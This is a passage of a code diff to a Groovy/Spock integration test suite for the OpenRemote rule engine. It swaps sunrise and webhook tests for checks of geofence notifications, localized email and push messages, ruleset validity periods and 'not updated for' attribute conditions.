-        advancePseudoClock(rule.rules[0].when.groups[0].items[0].sun.offsetMins, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired again and the rule should have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 100
-        }
-
-        when: "a ruleset with twilight trigger condition is added whose action updates the thing asset"
-        rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleTwilight.json").text
-        rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Twilight Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
-        sunTimes = sunsetCalculator.execute()
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the next twilight should be calculated and should be in the future"
-        assert sunTimes.getRise() != null
-        assert sunTimes.getRise().toInstant().isAfter(timerService.getNow())
-
-        and: "the rule should not have triggered"
-        conditions.eventually {
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("twilightHorizon").get().getValue().orElse(0) == 0
-        }
-
-        when: "time advances slightly past the next occurrence time and the rule engine fires"
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds()+1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("twilightHorizon").get().getValue().orElse(0) == 100
-        }
-
-        cleanup: "static variables are reset"
-        if (notificationService != null) {
-            notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
-            notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
-        }
+    and: "two push notifications should have been sent to the consoles via the linked user targets with test-realm-role% realm attribute with the title 'Linked user test'"
+    conditions.eventually {
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id
+      } == 1
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id
+      } == 1
     }
 
-    def "Trigger webhook when thing asset has changed"() {
-
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def webhookService = container.getService(WebhookService.class)
-        RulesEngine realmBuildingEngine
-
-        and: "the web target builder is configured to use the mock server"
-        WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
-
-        and: "a thing asset is added to the building realm"
-        def thingId = UniqueIdentifierGenerator.generateId("TestThing")
-        def thingAsset = new ThingAsset("TestThing")
-                .setId(thingId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-                .addAttributes(
-                        new Attribute<>("webhookAttribute", TEXT).addMeta(
-                                new MetaItem<>(MetaItemType.RULE_STATE)
-                        )
-                )
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        and: "a ruleset with 'has value' condition is added whose action triggers the webhook"
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Webhook Rule",
-                Ruleset.Lang.JSON,
-                getClass().getResource("/org/openremote/test/rules/JsonRuleWebhook.json").text)
-        ruleset = rulesetStorageService.merge(ruleset)
-        assert ruleset != null
-
-        expect: "the attribute we will change being unset"
-        conditions.eventually {
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset != null
-            assert thingAsset.getAttribute("webhookAttribute").get() != null
-            assert !thingAsset.getAttribute("webhookAttribute").get().getValue().isPresent()
-        }
-
-        and: "the rule engines to become available and be running with asset states and deployments inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.deployments.size() == 1
-            assert realmBuildingEngine.deployments.values().iterator().next().name == "Webhook Rule"
-            assert realmBuildingEngine.deployments.values().iterator().next().status == DEPLOYED
-            assert realmBuildingEngine.facts.assetStates.size() == (DEMO_RULE_STATES_SMART_BUILDING + 1)
-            assert realmBuildingEngine.lastFireTimestamp > 0
-        }
-
-        when: "the webhook attribute is changing"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(thingId, "webhookAttribute", "test_message"))
-
-        then: "the webhook attribute should have been updated"
-        conditions.eventually {
-            def thingAsset2 = assetStorageService.find(thingId, true)
-            assert thingAsset2 != null
-            assert thingAsset2.getAttribute("webhookAttribute").get().value.get() == "test_message"
-        }
-
-        expect: "The mock server has received a successful response"
-        conditions.eventually {
-            assert mockServer.successCount == 2
-            assert mockServer.failureCount == 0
-        }
-
-        cleanup: "disable mock filter"
-        mockServer.finished = true
+    and: "a push notifications should have been sent to the consoles of the linked user target with test-realm-role-2 realm attribute with the title 'Linked user test 2'"
+    conditions.eventually {
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test 2" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id
+      } == 1
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test 2" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id
+      } == 1
     }
 
-    /**
-     * A rule only fires for the console again once it has stopped matching it, so the engine must complete an execution
-     * with the inside location before the console can be moved out again.
-     */
-    private static void awaitInsideGeofenceEvaluated(RulesEngine engine, String consoleId, PollingConditions conditions) {
-        conditions.eventually {
-            def assetState = engine.facts.assetStates.find {it.id == consoleId && it.name == Asset.LOCATION.name}
-            assert assetState != null
-            assert assetState.getValue(GeoJSONPoint.class).map{it.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x}.orElse(false)
-            assert assetState.getValue(GeoJSONPoint.class).map{it.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y}.orElse(false)
-            assert engine.lastFireTimestamp > assetState.timestamp
-        }
+    and: "no push notification should have been sent for the test-realm-role-3 notification action"
+    conditions.eventually {
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test 3" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id
+      } == 0
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Linked user test 3" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id
+      } == 0
     }
+
+    and: "an email notification should have been sent to test@openremote.io with the triggered asset in the body but only containing the triggered asset states"
+    conditions.eventually {
+      assert emailMessages.any {
+        it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
+        && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "test@openremote.io"
+        && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"
+      }
+    }
+
+    and : "an email notification should have been sent to the asset's linked user(s) (only testuser2 has email notifications enabled)"
+    conditions.eventually {
+      assert emailMessages.any {
+        it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
+        && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "testuser2@openremote.local"
+        && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"
+      }
+    }
+
+    and: "an localized email notification should have been sent with the triggered asset in the body but only containing the triggered asset states"
+    String expectedHtml = "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"
+    conditions.eventually {
+      assert localizedMessages.size() == 7
+      // Get only email messages
+      emailMessages = localizedMessages.findAll { localizedMsg ->
+        localizedMsg.getMessages().values().stream().allMatch { message ->
+          message.type == EmailNotificationMessage.TYPE
+        }
+      }
+
+      // Verify email content
+      assert emailMessages.stream().allMatch {
+        it.getMessages().values().stream().allMatch(m -> {
+          ((EmailNotificationMessage) m).getHtml() == expectedHtml
+        })
+      }
+
+      assert emailMessages.stream().filter {
+        it.getMessages().values().stream().allMatch {
+          ((EmailNotificationMessage) it).getSubject() == "Demo Apartment - All Lights Off"
+        }
+      }.count() == 3
+
+      assert emailMessages.stream().filter {
+        it.getMessages().values().stream().allMatch {
+          ((EmailNotificationMessage) it).getSubject() == "Linked user localized user test"
+        }
+      }.count() == 2
+
+      // Get push messages
+      def pushMessages = localizedMessages.findAll { localizedMsg ->
+        localizedMsg.getMessages().values().stream().allMatch { message ->
+          message.type == PushNotificationMessage.TYPE
+        }
+      }
+
+      // Verify push notifications
+      def assetIdPushNotification = pushMessages.find { localizedMsg ->
+        localizedMsg.getMessages().get("en") instanceof PushNotificationMessage &&
+        ((PushNotificationMessage) localizedMsg.getMessages().get("en")).getBody()?.contains(consoleRegistration.id)
+      }
+
+      assert assetIdPushNotification != null
+      assert ((PushNotificationMessage) assetIdPushNotification.getMessages().get("en")).getBody() == "English: Asset ${consoleRegistration.id} has moved"
+      assert ((PushNotificationMessage) assetIdPushNotification.getMessages().get("nl")).getBody() == "Nederlands: Asset ${consoleRegistration.id} is verplaatst"
+
+      // Verify no unprocessed placeholders remain
+      assert pushMessages.every { localizedMsg ->
+        localizedMsg.getMessages().values().every { msg ->
+          !((PushNotificationMessage) msg).getBody()?.contains("%ASSET_ID%")
+        }
+      }
+    }
+
+    and: "a push notification with asset ID should have been sent to both linked users"
+    conditions.eventually {
+      // Count notifications for users with test-realm-role
+      def linkedNotifications = pushTargetsAndMessages.findAll {
+        it.v2.title == "Linked Asset ID Test" &&
+        it.v2.body == "This notification is about asset: ${consoleRegistration.id}"
+      }
+      assert linkedNotifications.size() == 2 // should be sent to both linked users
+    }
+
+    and: "the action URL should contain the corect asset ID"
+    conditions.eventually {
+      // First find the relevant message
+      def targetMessage = pushTargetsAndMessages.find { it.v2.title == "URL Asset ID Test" }
+      assert targetMessage != null
+
+      // Then verify URL
+      assert targetMessage.v2.action?.url == "/assets/${consoleRegistration.id}/details"
+    }
+
+    and: "notifications should still contain asset ID even for user without access"
+    conditions.eventually {
+      assetStorageService.storeUserAssetLinks([
+        new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser3Id, consoleRegistration.id)
+      ])
+      // Print debug info
+      println "Available notifications:"
+      pushTargetsAndMessages.each { target, msg ->
+        println "Target: ${target}, Message: title='${msg.title}', body='${msg.body}'"
+      }
+
+      assert pushTargetsAndMessages.any {
+        it.v1.type == Notification.TargetType.ASSET &&
+        it.v2.title == "Asset ID Test" &&
+        it.v2.body == "Your asset ID is: ${consoleRegistration.id}"
+      }
+    }
+
+    and: "after a few seconds the rule should not have fired again"
+    new PollingConditions(timeout: 5, initialDelay: 1).eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 1
+    }
+
+    when: "the console device moves back inside the home geofence (as defined in the rule)"
+    def lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
+
+    then: "the engine fires at least one more time"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+    }
+
+    and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
+    awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
+
+    when: "the console device moves outside the home geofence again (as defined in the rule)"
+    emailMessages.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(-10d, -4d)))
+
+    then: "another notification should have been sent to the console"
+    conditions.eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 2
+    }
+
+    and: "an email notification should have been sent to test@openremote.io with the triggered asset in the body but only containing the triggered asset states"
+    conditions.eventually {
+      assert emailMessages.any {
+        it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
+        && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "test@openremote.io"
+        && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(new GeoJSONPoint(-10d, -4d)).orElse("") + "</td></tr></table>"
+      }
+    }
+
+    when: "the console sends a location update with a new location but still outside the geofence"
+    def timestamp = assetStorageService.find(consoleRegistration.id, true).getAttribute(Asset.LOCATION).flatMap{
+      it.getTimestamp()
+    }.orElse(timerService.getCurrentTimeMillis())
+    def attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(10d, 10d), timestamp)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "after a few seconds the rule should not have fired again"
+    new PollingConditions(timeout: 5, initialDelay: 1).eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 2
+    }
+
+    when: "the ruleset is modified to add a 4hr recurrence per asset"
+    def version = ruleset.version
+    JsonRulesetDefinition jsonRules = ValueUtil.JSON.readValue(ruleset.rules, JsonRulesetDefinition.class)
+    jsonRules.rules[0].recurrence.mins = 240
+    ruleset.rules = ValueUtil.asJSON(jsonRules).orElse(null)
+    ruleset = rulesetStorageService.merge(ruleset)
+
+    then: "the ruleset to be redeployed"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.version == version+1
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.status == DEPLOYED
+    }
+
+    and: "another notification should have been sent to the console when rule is redeployed"
+    conditions.eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 3
+    }
+
+    when: "the console device moves back inside the home geofence (as defined in the rule)"
+    lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
+
+    then: "the engine fires at least one more time"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+    }
+
+    and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
+    awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
+
+    when: "the console device moves outside the home geofence again (as defined in the rule)"
+    attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d))
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "after a few seconds the rule should not have fired again"
+    new PollingConditions(timeout: 5, initialDelay: 1).eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 3
+    }
+
+    when: "the console device moves back inside the home geofence (as defined in the rule)"
+    lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
+
+    then: "the engine fires at least one more time"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+    }
+
+    and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
+    awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
+
+    when: "when time advances 5 hours"
+    advancePseudoClock(5, HOURS, container)
+
+    and: "the console device moves outside the home geofence again (as defined in the rule)"
+    attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d))
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "another notification should have been sent to the console"
+    conditions.eventually {
+      assert pushTargetsAndMessages.findAll {
+        it.v2.title == "Test title" && it.v1.id == consoleRegistration.id
+      }.size() == 4
+    }
+
+    when: "a validity period is added to the ruleset"
+    version = ruleset.version
+    def validityStart = Instant.ofEpochMilli(getClockTimeOf(container)).plus(2, ChronoUnit.HOURS)
+    def validityEnd = Instant.ofEpochMilli(getClockTimeOf(container)).plus(4, ChronoUnit.HOURS)
+    def recur = new Recur<>(Frequency.DAILY, 3)
+    recur.setInterval(2)
+    def calendarEvent = new CalendarEvent(
+            Date.from(validityStart),
+            Date.from(validityEnd),
+            recur)
+    ruleset.setValidity(calendarEvent)
+    ruleset = rulesetStorageService.merge(ruleset)
+
+    then: "the ruleset should be redeployed and paused until 1st occurrence"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.version == version+1
+      assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
+    }
+
+    when: "the same AttributeEvent is sent"
+    timestamp = attributeEvent.getTimestamp()+1
+    attributeEvent.setTimestamp(timestamp)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the event should have been committed to the DB"
+    conditions.eventually {
+      def console = assetStorageService.find(consoleRegistration.id, true)
+      assert console.getAttribute(Asset.LOCATION).flatMap{
+        it.getTimestamp()
+      }.orElse(0) == timestamp
+    }
+
+    and: "no notification should have been sent as outside the validity period"
+    assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 4
+
+    when: "time advances to inside the validity period"
+    advancePseudoClock(3, HOURS, container)
+
+    then: "the ruleset should be unpaused (1st occurrence)"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.status == DEPLOYED
+    }
+
+    when: "the same AttributeEvent is sent"
+    timestamp = attributeEvent.getTimestamp()+1
+    attributeEvent.setTimestamp(timestamp)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the event should have been committed to the DB"
+    conditions.eventually {
+      def console = assetStorageService.find(consoleRegistration.id, true)
+      assert console.getAttribute(Asset.LOCATION).flatMap{
+        it.getTimestamp()
+      }.orElse(0) == timestamp
+    }
+
+    and: "another notification should have been sent as inside the validity period"
+    conditions.eventually {
+      assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 5
+    }
+
+    when: "time advances past the validity period"
+    advancePseudoClock(1, HOURS, container)
+
+    then: "the ruleset should become paused again (until next occurrence)"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
+    }
+
+    when: "the same AttributeEvent is sent"
+    timestamp = attributeEvent.getTimestamp()+1
+    attributeEvent.setTimestamp(timestamp)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the event should have been committed to the DB"
+    conditions.eventually {
+      def console = assetStorageService.find(consoleRegistration.id, true)
+      assert console.getAttribute(Asset.LOCATION).flatMap{
+        it.getTimestamp()
+      }.orElse(0) == timestamp
+    }
+
+    and: "no notification should have been sent as outside the validity period"
+    assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 5
+
+    when: "time advances to inside the next validity period"
+    advancePseudoClock(47, HOURS, container)
+
+    then: "eventually the ruleset should be unpaused (next occurrence)"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.status == DEPLOYED
+    }
+
+    when: "time advances past the validity period"
+    advancePseudoClock(1, HOURS, container)
+
+    then: "the ruleset should become paused again (until last occurrence)"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
+    }
+
+    when: "time advances to inside the next validity period"
+    advancePseudoClock(47, HOURS, container)
+
+    then: "eventually the ruleset should be unpaused (last occurrence)"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.status == DEPLOYED
+    }
+
+    when: "time advances past the validity period"
+    advancePseudoClock(1, HOURS, container)
+
+    then: "the ruleset should expire"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.find{
+        it.key == ruleset.id
+      }.value.status == EXPIRED
+    }
+
+    cleanup: "static variables are reset and the mock is removed"
+    if (originalDebounceMillis != null) {
+      ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = originalDebounceMillis
+    }
+    if (notificationService != null) {
+      notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+      notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+    }
+  }
+
+  def "Trigger actions when an attribute is not updated for a specified duration"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "the pseudo clock is stopped"
+    stopPseudoClock()
+
+    when: "a light asset is added to the building realm"
+    def lightId = UniqueIdentifierGenerator.generateId("LightTest")
+    def lightAsset = new LightAsset("LightTest")
+            .setId(lightId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+
+    def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
+    lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
+    lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should be present"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light != null
+    }
+
+    // RuleSet: WHEN:
+    // Any light asset has its onOff attribute not updated for 3 minutes
+    // AND
+    // Any light asset has its brightness attribute greater than 50
+    // THEN:
+    // Set the notes of the light asset to "Matched"
+    when: "a ruleset with a notUpdatedFor attribute condition has been added"
+    def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonNotUpdatedForRule.json").text
+    def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Not Updated For Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    def lastFireTimestamp = 0
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2 // 2 additional rule states
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "the light asset is updated with onOff set to true and brightness set to 100"
+    lightAsset = assetStorageService.find(lightId)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.ON_OFF, true))
+
+    then: "the light asset should have its onOff attribute set to true and brightness set to 100"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("onOff").get().getValue().orElse(false) == true
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset note attribute should still be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 1 minute"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset note attribute should still be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 2 minutes"
+    advancePseudoClock(2, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset note attribute should be set to Matched" // because onOff was still unchanged for 3 minutes and brightness was above 50
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
+    }
+
+    when: "brightness is updated to 0 and notes is updated to empty"
+    lightAsset = assetStorageService.find(lightId)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 0))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.NOTES, ""))
+
+    then: "the light asset should have its brightness set to 0 and notes set to empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "brightness is updated to 100"
+    lightAsset = assetStorageService.find(lightId)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
+
+    then: "the light asset should have its brightness set to 100"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
+    }
+
+    and: "notes should still be empty until the rule engine fires"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset note attribute should be set to Matched" // because onOff was still unchanged for 3 minutes and brightness was set to be above 50 again
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
+    }
+  }
+
+  def "Trigger actions when attribute conditions match for specified durations"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "the pseudo clock is stopped"
+    stopPseudoClock()
+
+    when: "a light asset is added to the building realm"
+    def lightId = UniqueIdentifierGenerator.generateId("TestLight")
+    def lightAsset = new LightAsset("TestLight")
+            .setId(lightId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+
+
+    def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
+    lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
+    lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
+    lightAsset.getAttributes().get("notes").get().addMeta(ruleState)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should be present"
+    conditions.eventually {
